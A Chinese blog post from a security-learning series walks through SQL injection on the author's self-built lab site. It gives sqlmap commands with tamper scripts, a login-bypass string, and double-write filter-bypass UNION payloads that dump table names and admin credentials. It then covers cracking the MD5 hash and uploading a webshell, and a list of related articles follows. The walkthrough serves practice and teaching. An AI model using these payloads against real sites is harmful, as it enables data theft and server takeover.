SQL注入(4)——实战SQL注入拿webshell

最新推荐文章于 2024-08-22 22:13:41 发布
最新推荐文章于 2024-08-22 22:13:41 发布
阅读量1.2k 收藏 13
点赞数 4
分类专栏: 安全 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/realmels/article/details/117338077
版权

本专栏是笔者的网络安全学习笔记,一面分享,同时作为笔记

前文链接

  1. WAMP/DVWA/sqli-labs 搭建
  2. burpsuite工具抓包及Intruder暴力破解的使用
  3. 目录扫描,请求重发,漏洞扫描等工具的使用
  4. 网站信息收集及nmap的下载使用
  5. SQL注入(1)——了解成因和手工注入方法
  6. SQL注入(2)——各种注入
  7. SQL注入(3)——SQLMAP

通过一个实例来进行SQL注入的实战。

源码下载:
GitHub:https://github.com/13337356453/SQLTest/
CSDN:https://download.csdn.net/download/realmels/19136813

前言

SQL注入也讲了这么多了,都是些理论的东西,这边我自己随便弄了个小靶场来练习SQL注入。

我这个小靶场是根据我之前通过SQL注入弄下来的靶场改的(当然不可能找个网站来黑,要遵纪守法),大体和原理是差不多的,没有好看的CSS,代码也很简陋。

同时这是我第一次接触PHP,本人不是搞前端的,能用就行。

在使用之前,先下载源码。

创建密码为SQLTestsql用户。或在model.php中配置MySQL连接信息。并执行sqltest.sql文件。

可以在下载源代码后自己不看源码尝试一下,作不出再看源码。同时该博客有详细解析。

测试ip :192.168.1.7

测试流程

访问网站的主页,到处看看有什么东西。

在这里插入图片描述

访问新闻页面,发现有参数id怀疑存在SQL注入,输入and 1=1and 1=2进行测试。

在这里插入图片描述
在这里插入图片描述都返回了正常的界面,不确定是否存在注入漏洞,放进SQLMap里扫一手。

sqlmap -u http://192.168.1.7/news.php?id=1 --random-agent -level 3 --tamper base64encode,equaltolike -batch

在它慢慢扫的时候,继续看其他的页面。

看见有一个用户信息获取的界面,可以输入用户id以获取用户信息。
在这里插入图片描述
随便输入1,按下查询,页面没有发生变化,弹出了id为1的用户信息。
在这里插入图片描述
此时SQLMap扫的差不多了,并没有发现注入漏洞。
在这里插入图片描述
界面没有刷新,盲猜是Ajax的数据提交。

用bp抓包看一下。
在这里插入图片描述
在这里插入图片描述
id参数可控,输入and 1=1and 1=2进行测试
在这里插入图片描述

在这里插入图片描述
两次都无响应,不过先不慌,用SQLMAP扫一手。

右键请求,复制到文件,将其保存到文件

在这里插入图片描述
我这里将文件保存为1,可以打开文件查看内容
在这里插入图片描述

POST /getUser.php HTTP/1.1
Host: 192.168.1.7
Content-Length: 12
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.1.7
Referer: http://192.168.1.7/user.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

id=1

文件中储存了请求的内容,先cd到同一路径,然后用SQLMAP扫一手

sqlmap -r .\1 --random-agent -level 3 -tamper base64encode,equaltolike -batch

在这里插入图片描述
继续观察网页,在url后面加上一个admin,直接出了后台地址。

在这里插入图片描述
输入万能密码试一下。
’ or ‘1’=‘1’–+
在这里插入图片描述
并没有什么用。

此时SQLMAP差不多扫好了,看看。
在这里插入图片描述
也没有扫出来,这就有点尴尬了,不过问题不大,有时工具会误判,手工试一下。

常见的绕过脚本有大小写绕过,双写绕过,两次URL全编码绕过等。这里一个一个试。

大小写
payload : id=1 AnD 1=1
在这里插入图片描述
无响应。

双写绕过
payload : id=1 anandd 1=1
在这里插入图片描述
返回了正常的请求,有戏。
输入

payload : id=1 anandd 1=2

在这里插入图片描述
确认存在注入漏洞。


获取回显位置
payload : id=-1 ununionion selselectect 1,2,3
在这里插入图片描述
三个位置都可以回显。

爆数据库版本,数据库名,用户
payload : id=-1 ununionion selselectect version(),database(),user()
在这里插入图片描述
爆表名
payload : id=-1 ununionion selselectect 1,2,group_concat(table_name)+frfromom+infoorrmation_schema.tables+wwherehere+table_schema=database()
在这里插入图片描述
得到表名为admin,news,products,users

爆列名
payload:id=-1+ununionion+selselectect+1,2,group_concat(column_name)+frfromom+infoorrmation_schema.columns+wwherehere+table_schema=database()+anandd+table_name='admin'
在这里插入图片描述
爆内容
payload : id=-1+ununionion+selselectect+1,2,group_concat(uname,',',pwd)+frfromom+admin+limit+0,1
在这里插入图片描述

得到的pwd是一个md5值,在在线解密网站上进行解密。
https://www.cmd5.com/
在这里插入图片描述
登录后台。

在这里插入图片描述
有文件上传点,直接上传WebShell,蚁剑连接

在这里插入图片描述
在这里插入图片描述
渗透成功。

结语

此外,还有其他的方法,可自行尝试

本人小白,希望各位大佬能给我提出意见。

漫路在线
关注
专栏目录
Java反序列化和JNDI注入漏洞案例实战
悦分享
08-04 1025
CORBA全称(Common ObjectRequest Broker Architecture)也就是公共对象请求代理体系结构,是OMG(对象管理组织,一个非盈利性的计算机行业标准协会)制定的一种标准的面向对象应用程序体系规范。其提出是为了解决不同应用程序间的通信,曾是分布式计算的主流技术。CORBA标准主要分为三个部分,IDL(接口语言)、ORB(对象请求代理)、IIOP(ORB之间的操作协议)。其结构主要分为三部分:naming service、client side、servant side。...
SQL注入得到WEBSHELL
11-15 1030
一.通过SQL注入得到WEBSHELL的原理: N.E.V.E.R的方法:利用数据库备份得到WEBSHELL。创建一个表,在表中建一个字段用来保存木马数据。然后利用MSSQL导出库文件的办法把整个数据导出来,最后再删除新建的表。 分析: N.E.V.E.R利用了MSSQL的备份数据库功能。把数据导出来,设想数据库中有之类的ASP标实符,导出文件,文件名以.ASP的形式保存。然后文件又保存在WEB
Web漏洞介绍和Sql注入漏洞
最新发布
2401_82505448的博客
08-22 537
常规渗透测试流程漏洞探测包括:web漏洞测试,系统漏洞测试工具探测、手工验证优先找的漏洞:中间(件)漏洞、框架漏洞...webserver可以在这查漏洞poc自动化漏洞检测脚本exp漏洞利用脚本(工具)
SQL注入实战---利用“dbo”获得SQL管理权限和系统权限
Akuma专栏
04-07 956
刚刚开始学习SQL注入入侵,有写的不对和不好的地方希望各位师哥,师姐们多多指导。在一个供求信息发布的网站上测试了一下,页面Http://www.xxx.com/new/new.asp?id=49我做了如下测试:(1) Http://www.xxx.com/new/new.asp?id=49Microsoft OLE DB Provider for ODBC Drivers 错误 8
sql注入实战
2201_75735270的博客
07-31 993
SQL注入是一种代码注入技术,过去常常用于攻击数据驱动性的应用,实质就是将恶意的SQL代码注入到特定字段用于实施拖库攻击等。SQL注入的成功必须借助应用程序的安全漏洞,例如用户输入没有经过正确地过滤(针对某些特定字符串)或者没有特别强调类型的时候,都容易造成异常地执行SQL语句。SQL注入是网站渗透中最常用的攻击技术,但是其实SQL注入可以用来攻击所有的SQL数据库。
web安全】——基于SQL注入拿到webshell
Demo不是emo的博客
11-20 4935
今天参加远程面试的时候面试官问了这样一个题:“你知道哪些通过注入漏洞获取服务器权限的方法?请详细讲讲,”这我直接愣住了,平时渗透中sql注入我一般用来获取数据库的数据信息,虽然在我记忆中我曾经学过通过注入漏洞获取服务器权限的方法,但已经忘得差不多了,所以今天写一篇博客来巩固一下这方面的知识,希望对您们也有帮助
php mysql 注入一句话木马_渗透技术--SQL注入写一句话木马原理
weixin_39800387的博客
02-19 2424
讲一下SQL注入中写一句话拿webshell的原理,主要使用的是 SELECT ... INTO OUTFILE 这个语句,下面是一个语句的例子:SELECT * INTO OUTFILE 'C:\log1.txt'这样就可以把查询到的数据写入到C盘的log1.txt这个文件里面。利用这个原理我们可以把PHP的一句话木马写到磁盘上从而拿到webshell。本地的目标站点来实战一下,我们的目的是在目...
SQL注入过时?揭秘现代渗透测试实战与防范策略
本文档主要探讨了web渗透技术中的一个重要概念——SQL注入,以及它在现代网络安全环境中的地位变化。作者罗伟以亲身经历和案例分析的方式,强调了SQL注入虽然曾经是Web应用系统的常见漏洞,但随着技术的发展,它并未...
【ctfshow】web篇-SQL注入 wp
孤桜懶契
08-21 4484
前言 记录web的题目wp,慢慢变强,铸剑。 SQL注入 web171 根据语句可以看到有flag没有被显示出来,让我们拼接语句来绕过 //拼接sql语句查找指定ID用户 $sql = "select username,password from user where username !='flag' and id = '".$_GET['id']."' limit 1;"; GET传参会自己解码,注释可以用%23(#), --空格,–+等,或者拼接语句不用注释也行 判断有3个字段
网络注入教材
03-18
【网络注入教材】是针对网络安全领域中的一个特定技术——SQL注入进行深入讲解的教程集合。SQL注入是一种常见的黑客攻击手段,通过巧妙构造SQL查询语句,利用应用程序对用户输入数据的不当处理,来操纵数据库,获取...
sql注入教程.sql注入实战
11-09
sql注入详细教程 寻找存在sql注入的网址 探测过滤 tamper 得到shell
SQL注入写入Webshell
weixin_43749601的博客
03-28 2893
前言 在平时的CTF题目中,我们只是利用SQL注入漏洞去获取flag,但是在实际的渗透环境中,我们可以利用SQL注入漏洞去上传一个webshell,进而获取网站的后台权限。 首先,对于能否写入webshell是有条件的: secure_file_priv 支持数据导出。MySQL用secure_file_priv这个配置项来完成对数据导入导出的限制。如果secure_file_priv=NULL,MySQL服务会禁止导入和导出操作。通过命令查看secure-file-priv`的当前值,确认是否允许导入导
SQL注入webshell的实验
wangqiao258的博客
07-01 338
1.知道网站绝对路径2.数据库ROOT权限3.secure_file_priv不为NULL,为空或为网站路径查询mysql路径,猜测网站绝对路径查询当前用户查询secure_file_priv写入webshell测试shell
sql 注入实战
终日而思不如须臾所学。
11-30 1982
直接开整 // 后端接口 // get my all todos router.post("/api/todo/list", (req, res) => { let { _openid = 'kong', } = { ...req.body } console.log(_openid) const sql = ` select * from todo_today where _openid = '${_openid}' ` sqlQuery(sql,
SQL注入实战
qq_44915227的博客
04-17 1896
所谓的SQL注入,就是通过把恶意的sql命令插入web表单递交给服务器,或者输入域名或页面请求的查询字符串递交到服务器,达到欺骗服务器,让服务器执行这些恶意的sql命令,从而让攻击者,可以绕过一些机制,达到直接访问数据库的一种攻击手段,而不是按照设计者意图去执行SQL语句。
实战 | SQL注入
zkaqlaoniao的博客
10-30 308
由于传参是需要进行base64编码的,所以此处我们在使用sqlmap的时候需要用到tamper脚本中的base64encode.py脚本,只需要在常规的语句中机上。(7)接下来就是获取其中某一个表的字段名和字段值了,只需将相应的SQL语句进行BASE64编码,然后输入即可。环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等。我们都知道sql注入的传参有些是明文的,有些是经过编码或者加密的,所以我们搜索的时候不要仅限于。从这两者的反应可以判断出是数字型。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值